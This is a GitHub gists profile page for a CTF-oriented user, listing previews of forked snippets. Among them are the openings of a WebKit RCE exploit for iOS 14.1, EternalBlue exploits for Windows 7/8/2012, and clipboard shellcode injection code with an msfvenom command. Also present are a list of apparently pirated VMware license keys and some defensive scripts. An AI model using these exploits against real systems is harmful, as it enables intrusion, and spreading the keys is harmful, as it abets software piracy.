Skip to content

Instantly share code, notes, and snippets.

View hxlxmjxbbxs's full-sized avatar
🚩
CTF

Halim Jabbes hxlxmjxbbxs

🚩
CTF
View GitHub Profile
@hxlxmjxbbxs
hxlxmjxbbxs / deobf.cmd
Created April 1, 2023 17:25 — forked from a-sync/deobf.cmd
batch obfuscator / deobfuscator
@echo off & setlocal
if "%~1"=="" exit /b
if /i "%~x1" neq ".bat" if /i "%~x1" neq ".cmd" exit /b
<"%~1" ((for /l %%N in (1 1 8) do pause)>nul&findstr "^">"%~n1__%~x1")
@hxlxmjxbbxs
hxlxmjxbbxs / vmwk17key.txt
Created February 6, 2023 17:06 — forked from PurpleVibe32/vmwk17key.txt
Free VMware Workstation Pro 17 full license keys
Install VMWare Workstation PRO 17 (Read it right. PRO!)
This gist can get off at any time.
PLEASE, DONT COPY THIS. IF YOU FORK IT, DONT EDIT IT.
*If you have a problem comment and people will try to help you!
*No virus
*No spam just license key
*Based on william's gist
MC60H-DWHD5-H80U9-6V85M-8280D < worked for me!
4A4RR-813DK-M81A9-4U35H-06KND
@hxlxmjxbbxs
hxlxmjxbbxs / fuck.js
Created November 19, 2022 15:14 — forked from ujin5/fuck.js
WebKit RCE on ios 14.1
function sleep( sleepDuration ){
var now = new Date().getTime();
while(new Date().getTime() < now + sleepDuration){ /* do nothing */ }
}
function gc() {
for (let i = 0; i < 0x10; i++) {
new ArrayBuffer(0x1000000);
}
}
let data_view = new DataView(new ArrayBuffer(8));
@hxlxmjxbbxs
hxlxmjxbbxs / wazuhinstall.sh
Last active October 15, 2022 04:29 — forked from austinsonger/wazuhinstall.sh
Wazuh Install - Single Server
# Requirements
sudo apt install curl apt-transport-https unzip wget libcap2-bin software-properties-common lsb-release -y
sudo apt install gpgv gpgsm gnupg-l10n gnupg dirmngr -y
add-apt-repository ppa:openjdk-r/ppa
sudo apt update -y
sudo curl -so /etc/profile.d/myenvvars.sh https://gist.githubusercontent.com/austinsonger/2385ff1ef5ccb014aaed4d8684dd6e54/raw/e1d9b85b3383d1a50a54eac68ab7ad7c3e0c2797/myenvvars.sh
export JAVA_HOME=/usr/
sudo apt install openjdk-11-jdk -y
# Wazuh Prep
@hxlxmjxbbxs
hxlxmjxbbxs / ProxyNotShell_exchangePowerShell_BlockNonAdmins.ps1
Created October 8, 2022 10:19 — forked from ConanChiles/ProxyNotShell_exchangePowerShell_BlockNonAdmins.ps1
ProxyNotShell - disable Exchange PowerShell access for all users, excluding Exchange admins (derived from Exchange roles)
<# block non-Exchange admins from PowerShell access in Exchange
ProxyNotShell
CVE-2022-41040
CVE-2022-41082f
some bypasses have been found for the IIS block rules.
need to hard block PowerShell for those that don't **need** it.
Exchange allows PowerShell by default, block by exception. Not ideal, but workable.
@hxlxmjxbbxs
hxlxmjxbbxs / ClippyShellcodeInject.cs
Created August 14, 2022 04:55
Clipboard Shellcode Injection
// Using the clipboard as your code cave.
// Generate your shellcode with msfvenom or whatever
// Example: msfvenom -p windows/x64/exec CMD=calc exitfunc=thread -f raw -o <outputfile.bin>
// Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\ClippyShellcodeInject.cs
using System;
using System.IO;
using System.Runtime.InteropServices;
namespace ClippySCInject
@hxlxmjxbbxs
hxlxmjxbbxs / eternalblue_merge_shellcode.py
Created August 5, 2022 01:44 — forked from worawit/eternalblue_merge_shellcode.py
Windows x64 and x86 kernel shellcode for eternalblue exploit
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
import sys
from struct import pack
if len(sys.argv) < 4:
print('Usage: {} sc_x86 sc_x64 sc_out'.format(sys.argv[0]))
sys.exit()
sc_x86 = open(sys.argv[1], 'rb').read()
sc_x64 = open(sys.argv[2], 'rb').read()
@hxlxmjxbbxs
hxlxmjxbbxs / eternalblue8_exploit.py
Created August 5, 2022 01:44 — forked from worawit/eternalblue8_exploit.py
Eternalblue exploit for Windows 8/2012
#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb, ntlm
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
@hxlxmjxbbxs
hxlxmjxbbxs / eternalblue7_exploit.py
Created August 5, 2022 01:44 — forked from worawit/eternalblue7_exploit.py
Eternalblue exploit for Windows 7/2008
#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 7/2008 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)